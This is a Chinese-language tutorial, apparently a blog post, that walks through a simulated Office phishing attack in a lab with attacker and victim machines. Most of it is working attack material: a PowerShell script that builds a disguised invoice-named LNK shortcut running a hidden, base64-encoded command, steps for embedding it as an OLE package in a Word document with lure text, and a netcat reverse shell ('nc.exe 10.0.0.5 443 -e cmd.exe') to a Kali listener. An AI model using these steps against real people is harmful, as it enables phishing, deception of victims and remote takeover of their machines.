Office钓鱼攻击之OLE+LNK

通过Windows的office，可以实施许多钓鱼攻击，这里对其中的OLE+LNK，进行一个模拟钓鱼攻击，直接反弹shell。
实现的效果如下：

钓鱼效果

环境

本文使用的环境和工具如下（可选择其他版本的系统和office）：

• Netcat for Windows，即nc.exe

攻击机1（用于制造钓鱼文件）：

• Windows 10
• Microsoft Office Word 2016

攻击机2：

• kali

靶机：

• Windows 10
• Microsoft Office Word 2016（不一定需要和攻击机一致）

相关知识

• 钓鱼攻击：钓鱼式攻击是指企图从电子通讯中，通过伪装成信誉卓著的法人媒体以获得如用户名、密码和信用卡明细等个人敏感信息的犯罪诈骗过程。
• OLE：Object Linking and Embedding，对象连接与嵌入，简称OLE技术。OLE 不仅是桌面应用程序集成，而且还定义和实现了一种允许应用程序作为软件“对象”（数据集合和操作数据的函数）彼此进行“连接”的机制，这种连接机制和协议称为组件对象模型（COM）。OLE可以用来创建复合文档，复合文档包含了创建于不同源应用程序，有着不同类型的数据，因此它可以把文字、声音、图像、表格、应用程序等组合在一起。
• LNK：lnk文件是用于指向其他文件的一种文件。 这些文件通常称为快捷方式文件，通常它以快捷方式放在硬盘上，以方便使用者快速的调用。
• 恶意LNK文件：快捷方式（LNK）是一种引用其他文件或程序的通用方法，在系统启动或用户单击它时，就会打开或执行其他文件。攻击者可以通过快捷方式部署他们的持久性攻击工具。他们可能会创建一个新的快捷方式关联到某个恶意软件，同时把它伪装成一个合法的程序。或者攻击者也可以编辑已存在快捷方式的目标路径，这样受害者就会在不知不觉中运行恶意软件。

钓鱼文件准备

以管理员身份运行powershell，执行以下命令：

$command = 'Start-Process c:\shell.cmd'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)

$obj = New-object -comobject wscript.shell
$link = $obj.createshortcut("c:\Invoice-FinTech-0900541.lnk")
$link.windowstyle = "10"
$link.targetpath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$link.iconlocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe"
$link.arguments = "-Nop -sta -noni -w hidden -encodedCommand "+$encodedCommand
$link.save()

没报错就是执行成功了：

命令执行成功

依次点击插入->对象->对象：

插入对象

选择package，勾选显示为图标，点击更改图标：

更改图标

在弹出来的对话框中点击浏览，找到word的安装目录，选择WINWORD.EXE：

选择word

点击打开之后，可以看到原对话框样式已经改变，图标选择第二个，题注这里用的之前创建的lnk文件的名字Invoice-FinTech-0900541，然后点击确定：

image.png

选择刚刚脚本创建的文件：

选择文件

插入之后：

插入之后

适当加一点社工文字：

社工一下

然后保存，发给靶机，任意目录均可

下载Netcat for Windows，解压，移动到靶机上，记住其存放地址

新建一个TXT文件，写入内容：

C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

其中，C:\tools\nc.exe为刚刚记住的nc的存放路径，10.0.0.5为反弹shell的攻击机ip

重命名该文件为shell.cmd，然后移动到靶机的C盘根目录下

攻击实施

打开攻击机2，也就是kali，输入命令回车：

nc -lvnp 443

可以看到，监听已经建立：

监听建立

受害者在靶机打开文件，双击了图标，弹窗：

弹窗

选择打开，可以看到唤起了我们创建的恶意的cmd程序：

唤起恶意程序

可以看到，攻击机已经建立了shell连接，可以执行任意命令，反弹shell成功：

反弹shell成功

本文开头的图片中的弹窗命令如下：

mshta vbscript("You are hacked!",48,"Hacker")(window.close)

参考链接

• Phishing: OLE + LNK